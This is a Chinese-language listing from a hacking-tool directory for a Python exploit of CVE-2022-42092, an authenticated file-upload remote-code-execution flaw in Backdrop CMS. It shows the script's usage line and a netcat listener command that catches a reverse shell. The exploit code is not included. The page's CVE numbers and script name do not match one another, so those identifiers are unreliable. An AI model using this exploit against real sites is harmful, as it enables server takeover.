Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-42092 — CVE-2023-46818 Python3 漏洞利用程序,用于 Backdrop CMS <= 1.22.0 的认证远程命令执行(RCE) | Kitploit
工具/GitHubGitHub/ajdumanhug/cve-2022-42092
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubajdumanhug/cve-2022-42092

CVE-2022-42092

CVE-2023-46818 Python3 漏洞利用程序,用于 Backdrop CMS <= 1.22.0 的认证远程命令执行(RCE)

查看仓库
111年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-42092 Python 漏洞利用程序

🔥 描述

此 Python 漏洞利用脚本针对 Backdrop CMS 中的不受限制的文件上传漏洞,以实现远程代码执行(RCE)。

⚠️ 受影响版本

1.22.0 及之前版本 注意:Backdrop CMS 对此提出异议,认为需要高级权限,因此该漏洞可能仍存在于 1.22.0 以上的版本中。我猜测他们的意思是你需要先拥有管理员访问权限。尽管如此,它仍然是一个有效的漏洞,并且绝对可以利用它来获得系统的完全控制权。

⚙️ 使用方法

root@kitploit:~
python3 CVE-2022-42902.py <target_url> <username> <password> <listener_ip> <listener_port>

重要提示:在运行脚本之前,请先启动你的监听器:

root@kitploit:~
nc -lvnp <listener_port>

💻 示例运行

image

ℹ️ 参考

  • CVE-2022-42092 详情
下载工具